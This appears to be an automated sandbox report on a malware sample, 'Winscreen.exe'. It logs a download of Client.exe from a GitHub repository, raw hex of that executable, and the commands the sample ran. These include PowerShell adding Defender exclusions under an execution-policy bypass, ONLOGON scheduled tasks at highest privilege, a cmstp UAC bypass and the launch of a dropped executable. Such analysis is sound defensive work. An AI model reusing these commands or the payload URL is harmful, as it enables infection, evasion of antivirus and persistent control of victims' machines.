                                                                                      2024-10-05 19:57:31 UTC113OUTGET /darkZeusWeb/loadersoft/raw/refs/heads/main/Client.exe HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-05 19:57:32 UTC564INHTTP/1.1 302 Found
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 05 Oct 2024 19:57:32 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Access-Control-Allow-Origin:
                                                                                      Location: https://raw.githubusercontent.com/darkZeusWeb/loadersoft/refs/heads/main/Client.exe
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-10-05 19:57:32 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549800185.199.110.1334436336C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-05 19:57:32 UTC124OUTGET /darkZeusWeb/loadersoft/refs/heads/main/Client.exe HTTP/1.1
                                                                                      Host: raw.githubusercontent.com
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-05 19:57:32 UTC901INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 817664
                                                                                      Cache-Control: max-age=300
                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                      Content-Type: application/octet-stream
                                                                                      ETag: "24fc84bd0b2bcac6a7d21915c37c0c801e8ddd2c511c7f45769e679f03b9f1d4"
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: deny
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-GitHub-Request-Id: F113:30F1EE:19964A:1C5B1E:67019A2C
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 05 Oct 2024 19:57:32 GMT
                                                                                      Via: 1.1 varnish
                                                                                      X-Served-By: cache-ewr-kewr1740022-EWR
                                                                                      X-Cache: MISS
                                                                                      X-Cache-Hits: 0
                                                                                      X-Timer: S1728158253.850560,VS0,VE67
                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      X-Fastly-Request-ID: d248bac363d05e8d546a2d874437f8883158d2df
                                                                                      Expires: Sat, 05 Oct 2024 20:02:32 GMT
                                                                                      Source-Age: 0
                                                                                      2024-10-05 19:57:32 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 24 84 32 e2 60 e5 5c b1 60 e5 5c b1 60 e5 5c b1 d4 79 ad b1 68 e5 5c b1 d4 79 af b1 eb e5 5c b1 d4 79 ae b1 6d e5 5c b1 e0 9e a1 b1 62 e5 5c b1 e0 9e 58 b0 72 e5 5c b1 e0 9e 5f b0 6a e5 5c b1 e0 9e 59 b0 59 e5 5c b1 69 9d df b1 69 e5 5c b1 69 9d db b1 62 e5 5c b1 69 9d cf b1 67 e5 5c b1 60 e5 5d b1 43 e4 5c b1 ee 9e 59 b0 52 e5 5c b1 ee 9e 5c b0 61 e5 5c b1 ee 9e a3 b1 61 e5 5c
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$2`\`\`\yh\y\ym\b\Xr\_j\YY\ii\ib\ig\`]C\YR\\a\a\
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 02 00 00 48 8b cf e8 1d 39 01 00 4c 8b f8 48 8b cf e8 12 39 01 00 4c 8b f0 48 8b cf e8 07 39 01 00 48 8b d8 33 c0 48 85 db 0f 84 66 02 00 00 48 81 fb 00 00 01 00 0f 83 59 02 00 00 48 89 45 d7 48 89 45 e7 48 89 45 ef 4c 8b c3 33 d2 48 8d 4d d7 e8 aa f0 ff ff 90 44 89 be 28 01 00 00 41 80 e6 01 44 88 b6 50 01 00 00 48 8d 55 d7 48 83 7d ef 10 48 0f 43 55 d7 4c 8b c3 48 8b cf e8 c2 37 01 00 48 8d 4d d7 48 83 7d ef 10 48 0f 43 4d d7 48 8d 9e 30 01 00 00 48 8b d3 e8 b5 c0 01 00 48 8b d3 48 8b cb e8 2e 34 01 00 90 48 8b 55 ef 48 83 fa 10 0f 82 dc 01 00 00 48 ff c2 48 8b 4d d7 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 45 04 00 00 e8 22 d5 02 00 e9 a6 01 00 00 49 83 ff 01 0f 8c 9c 01 00 00 48 8b cf e8 27 38
                                                                                      Data Ascii: H9LH9LH9H3HfHYHEHEHEL3HMD(ADPHUH}HCULH7HMH}HCMH0HHH.4HUHHHMHHrH'HIH+HHE"IH'8
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 24 28 49 ff c4 8b 4c 24 20 48 83 c0 40 ff c1 48 89 44 24 28 49 81 c5 20 01 00 00 89 4c 24 20 49 83 c6 18 3b cb 72 a0 48 8b 8e 28 0c 00 00 48 85 c9 74 05 e8 a0 60 01 00 49 83 fc 08 0f 82 5d ff ff ff 48 8b df 81 e3 ff 01 00 00 48 2b fb 48 03 ef 48 85 db 74 15 48 8d 8e 20 0a 00 00 44 8b c3 49 03 cf 48 8b d5 e8 d5 a9 02 00 4a 8d 04 3b 48 89 86 20 0c 00 00 48 8b 8c 24 f0 00 00 00 48 33 cc e8 9a 96 02 00 48 8b 9c 24 58 01 00 00 48 81 c4 00 01 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 48 8b da 48 8b ca e8 c0 ec 02 00 48 83 7f 18 08 4c 8b c7 72 03 4c 8b 07 48 8b 4f 10 48 3b c8 75 20 33 d2 48 85 c9 74 1b 4c 2b c3 0f b7 03 66 41 39 04 18 75 0c 48 83 c3 02 48 83 e9 01 75 ec eb 02 b2 01 48 8b 5c 24 30 8a c2 48 83 c4 20
                                                                                      Data Ascii: $(IL$ H@HD$(I L$ I;rH(Ht`I]HH+HHtH DIHJ;H H$H3H$XHA_A^A]A\_^]H\$WH HHHHLrLHOH;u 3HtL+fA9uHHuH\$0H
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: ae 02 00 45 33 f6 41 8b c6 48 83 7c 24 48 ff 0f 94 c0 89 47 10 4c 89 74 24 30 c7 44 24 28 00 00 20 02 c7 44 24 20 03 00 00 00 45 33 c9 45 33 c0 ba 00 00 00 c0 48 8b ce ff 15 0a b4 03 00 48 8b d8 48 83 f8 ff 0f 85 8a 00 00 00 4c 89 75 88 0f 57 c0 f3 0f 7f 45 98 48 8b ce e8 1d ad 02 00 4c 8b c0 48 8b d6 48 8d 4d 88 e8 2e 46 ff ff 90 48 8d 55 88 48 8d 0d 66 3d 05 00 e8 29 e9 ff ff 90 48 8b 55 a0 49 3b d5 72 36 48 8d 14 55 02 00 00 00 48 8b 4d 88 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 17 02 00 00 e8 4d 55 02 00 ba 09 00 00 00 48 8d 0d 15 3d 05 00 e8 3c ed ff ff e9 f3 fd ff ff 44 0f b7 4f 04 45 03 cd 4c 89 74 24 38 48 8d 44 24 68 48 89 44 24 30 44 89 74 24 28 4c 89 74 24 20 4c 8b c7 ba a4 00 09 00 48
                                                                                      Data Ascii: E3AH|$HGLt$0D$( D$ E3E3HHHLuWEHLHHM.FHUHf=)HUI;r6HUHMHHrH'HIH+HHMUH=<DOELt$8HD$hHD$0Dt$(Lt$ LH
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 48 83 fa 08 72 3a 48 8d 14 55 02 00 00 00 48 8b 8c 24 d0 00 00 00 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 16 06 00 00 e8 cc 15 02 00 45 33 c0 4c 89 84 24 e0 00 00 00 48 c7 84 24 e8 00 00 00 07 00 00 00 66 44 89 84 24 d0 00 00 00 48 8b 94 24 c8 00 00 00 48 83 fa 08 72 3d 48 8d 14 55 02 00 00 00 48 8b 8c 24 b0 00 00 00 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 b4 05 00 00 e8 64 15 02 00 45 33 c0 45 84 ff 74 0e 83 bf 50 14 00 00 02 75 08 45 84 f6 75 08 45 8a e0 45 84 f6 74 07 45 84 ff b0 01 75 03 41 8a c0 88 86 01 02 00 00 8a 5c 24 51 48 8b cf e8 de 2d ff ff 33 d2 38 97 39 0d 00 00 75 2c 8a 87 6a 0d 00 00 4c 8d 8f 6b 0d 00 00 f6 d8 4d 1b c0 4d
                                                                                      Data Ascii: Hr:HUH$HHrH'HIH+HHE3L$H$fD$H$Hr=HUH$HHrH'HIH+HHdE3EtPuEuEEtEuA\$QH-389u,jLkMM
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 41 20 48 8b 42 28 48 89 41 28 48 8b 42 30 48 89 41 30 48 8b 42 38 48 89 41 38 48 8b 42 40 48 89 41 40 48 3b ee 74 2a 48 8b cd e8 71 d3 fe ff 41 b8 20 00 00 00 48 8b d6 48 8b cd e8 00 ea 01 00 33 c0 48 c7 46 18 07 00 00 00 48 89 46 10 66 89 06 48 8b 47 68 48 8b 6c 24 38 48 8b 74 24 40 48 89 43 68 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc 48 89 5c 24 10 57 48 83 ec 20 48 8b d9 4c 8d 44 24 30 48 83 c1 48 e8 21 f4 fe ff 33 ff 48 8d 8b 90 00 00 00 33 d2 40 88 7b 10 e8 41 fb ff ff 48 89 7b 60 48 89 7b 70 48 89 7b 68 48 89 bb b8 00 00 00 89 7b 24 40 88 bb c0 00 00 00 40 88 bb e1 00 00 00 40 88 bb ea 00 00 00 48 89 bb 0c 01 00 00 48 89 bb 18 01 00 00 66 89 bb 20 01 00 00 40 88 bb 22 01 00 00 89 bb 28 01 00 00 66 89 bb 50 01 00 00 48 8b 5c 24 38 48 83 c4
                                                                                      Data Ascii: A HB(HA(HB0HA0HB8HA8HB@HA@H;t*HqA HH3HFHFfHGhHl$8Ht$@HChHH\$0H _H\$WH HLD$0HH!3H3@{AH{`H{pH{hH{$@@@HHf @"(fPH\$8H
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 00 00 00 41 8b fe 74 12 48 8b 8b 88 00 00 00 48 8b d5 4d 63 c6 e8 5a 15 ff ff e8 e9 5b 00 00 8b c7 48 8b 5c 24 50 48 8b 6c 24 60 48 8b 74 24 68 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 83 c8 ff eb de c6 83 98 00 00 00 01 eb f2 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 80 79 18 00 49 8b f8 48 8b f2 48 89 51 38 48 8b d9 4c 89 41 30 74 19 4c 3b 41 20 77 22 48 8b 49 28 e8 bf a9 01 00 48 01 7b 28 48 29 7b 20 eb 0f 80 79 51 00 75 09 48 8b 49 60 e8 46 a0 ff ff 48 01 bb b8 00 00 00 80 7b 52 00 75 12 48 8d 8b 18 01 00 00 4c 8b c7 48 8b d6 e8 cf bb ff ff 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f e9 3b 5b 00 00 cc cc cc 4c 89 44 24 18 48 89 4c 24 08 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 20 4c 8b fa 4c 8b f1 4c 8b ca 4c 2b 09 49 b8 ab aa aa aa aa aa aa 2a
                                                                                      Data Ascii: AtHHMcZ[H\$PHl$`Ht$hH A_A^A]A\_H\$Ht$WH yIHHQ8HLA0tL;A w"HI(H{(H){ yQuHI`FH{RuHLHH\$0Ht$8H _;[LD$HL$SVWATAUAVAWH LLLL+I*
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 00 00 00 48 8b f8 48 3b c1 48 b8 ff ff ff ff ff ff ff 7f 48 0f 42 f9 48 8d 4f 01 48 3b c8 77 5b 48 03 c9 48 81 f9 00 10 00 00 72 0a e8 2f 46 fe ff 48 8b d0 eb 0f 48 85 c9 74 07 e8 90 55 01 00 eb ef 48 8b d5 48 89 7e 18 49 8b c6 48 89 16 48 8b fa 48 89 5e 10 48 8b cb 66 f3 ab 66 89 2c 5a 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 e8 00 53 fe ff cc e8 7e 53 fe ff cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 20 48 bb ff ff ff ff ff ff ff 7f 4d 8b f9 48 8b ea 48 8b f9 48 3b d3 0f 87 c9 00 00 00 4c 8b 71 18 48 83 ca 0f 48 3b d3 76 0c 48 b9 00 00 00 00 00 00 00 80 eb 2c 49 8b ce 48 8b c3 48 d1 e9 48 2b c1 4c 3b f0 77 e3 4a 8d 04 31 48 8b da 48 3b d0 48 0f 42 d8 48 8d 4b 01 48 81 f9 00 10 00 00
                                                                                      Data Ascii: HH;HHBHOH;w[HHr/FHHtUHH~IHHH^Hff,ZH\$0Hl$8Ht$@H|$HH A^S~SH\$Hl$Ht$WAVAWH HMHHH;LqHH;vH,IHHH+L;wJ1HH;HBHKH
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: 8b 5c 24 40 48 8b 74 24 48 48 83 c4 30 5f c3 cc 48 89 5c 24 10 57 48 83 ec 40 48 8b 05 57 b2 03 00 48 33 c4 48 89 44 24 38 48 8b f9 48 8d 54 24 20 33 c9 ff 15 f7 75 02 00 83 7c 24 20 01 0f 97 c0 33 db 88 87 00 01 00 00 8a cb ff 15 e7 75 02 00 85 c0 0f 95 c0 ff c3 88 07 48 ff c7 81 fb 00 01 00 00 72 e4 48 8b 4c 24 38 48 33 cc e8 ae 16 01 00 48 8b 5c 24 58 48 83 c4 40 5f c3 cc cc cc 48 8b c4 48 89 58 10 48 89 68 18 48 89 48 08 56 57 41 56 48 83 ec 30 4c 8b f2 48 8b d9 33 ed 89 68 d8 48 89 29 48 89 69 10 48 c7 41 18 07 00 00 00 66 89 29 c7 40 d8 01 00 00 00 8b f5 48 8b 12 49 8b 46 08 48 2b c2 48 83 f8 01 76 6e 0f b6 7c 32 01 b9 00 01 00 00 0f af f9 0f b6 04 32 66 03 f8 48 8b 4b 10 48 3b 4b 18 73 20 48 8d 41 01 48 89 43 10 48 8b c3 48 83 7b 18 08 72 03 48 8b
                                                                                      Data Ascii: \$@Ht$HH0_H\$WH@HWH3HD$8HHT$ 3u|$ 3uHrHL$8H3H\$XH@_HHXHhHHVWAVH0LH3hH)HiHAf)@HIFH+Hvn|22fHKH;Ks HAHCHH{rH
                                                                                      2024-10-05 19:57:33 UTC16384INData Raw: ff ca 44 89 ab e8 2c 00 00 03 c2 49 8b e9 8b 93 d8 2c 00 00 83 ea 10 89 84 24 a0 00 00 00 3b c2 89 94 24 98 00 00 00 44 8b c2 44 0f 4c c0 44 89 84 24 a8 00 00 00 be 07 00 00 00 8b 0f 41 3b c8 7c 36 3b c8 0f 8f 54 07 00 00 75 0c 8b 43 28 39 43 0c 0f 8d 46 07 00 00 3b ca 7c 0d 44 38 ab de 2c 00 00 0f 84 2e 07 00 00 49 8b e9 3b 8b d8 2c 00 00 0f 8d 1f 07 00 00 8b 8b ec 2c 00 00 8d 41 f8 39 83 e8 2c 00 00 76 35 8d 04 09 48 8b 4d 00 8b d0 48 c1 e2 04 89 83 ec 2c 00 00 e8 13 6b 01 00 48 8b f0 48 85 c0 75 0c 48 8d 0d 30 bd 03 00 e8 a7 6a fe ff 48 89 75 00 be 07 00 00 00 8b 83 e8 2c 00 00 44 8b f8 49 c1 e7 04 4c 03 7d 00 ff c0 89 83 e8 2c 00 00 48 63 07 48 03 47 10 8b 08 e8 b7 54 01 00 44 8b 57 04 41 bb 10 00 00 00 41 8b cb 8b d0 41 2b ca d3 ea 8b 8b c0 00 00 00
                                                                                      Data Ascii: D,I,$;$DDLD$A;|6;TuC(9CF;|D8,.I;,,A9,v5HMH,kHHuH0jHu,DIL},HcHGTDWAAA+


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:15:56:58
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\Desktop\Winscreen.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\Winscreen.exe"
                                                                                      Imagebase:0xe90000
                                                                                      File size:4'116'480 bytes
                                                                                      MD5 hash:05B30A117A6915C4591C65449E83F0A4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:15:57:01
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:15:57:01
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:15:57:07
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /F /TN "explorer" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\explorer.exe" /RL HIGHEST
                                                                                      Imagebase:0x7ff6ec350000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:15:57:07
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\explorer.exe"
                                                                                      Imagebase:0x2e0000
                                                                                      File size:579'072 bytes
                                                                                      MD5 hash:753F5F61C1F444BB1524A26C0DF29F38
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.2155649475.0000000002631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /F /TN "upx" /SC ONLOGON /TR "C:\Users\user\AppData\Roaming\upx.exe" /RL HIGHEST
                                                                                      Imagebase:0x7ff6ec350000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\upx.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\upx.exe"
                                                                                      Imagebase:0x530000
                                                                                      File size:5'632 bytes
                                                                                      MD5 hash:78CC94F417D1BE1A25ACE9F52D52E23D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\taskmoder.exe'
                                                                                      Imagebase:0x7ff7be880000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:15:57:08
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\cmstp.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xtm5g4p2.inf
                                                                                      Imagebase:0x7ff72a5e0000
                                                                                      File size:98'304 bytes
                                                                                      MD5 hash:4CC43FE4D397FF79FA69F397E016DF52
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2134081504.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2134203640.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2133637563.000001411E6B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2134104427.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2133499260.000001411E6B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2134128806.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2134180945.000001411E6C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2133597439.000001411E6B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:15:57:09
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                      Imagebase:0x540000
                                                                                      File size:579'072 bytes
                                                                                      MD5 hash:753F5F61C1F444BB1524A26C0DF29F38
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2210229284.0000000002963000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:15:57:10
                                                                                      Start date:05/10/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd /c start C:\Windows\temp\ydztkyrb.exe
                                                                                      Imagebase:0x7ff7ad7e0000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
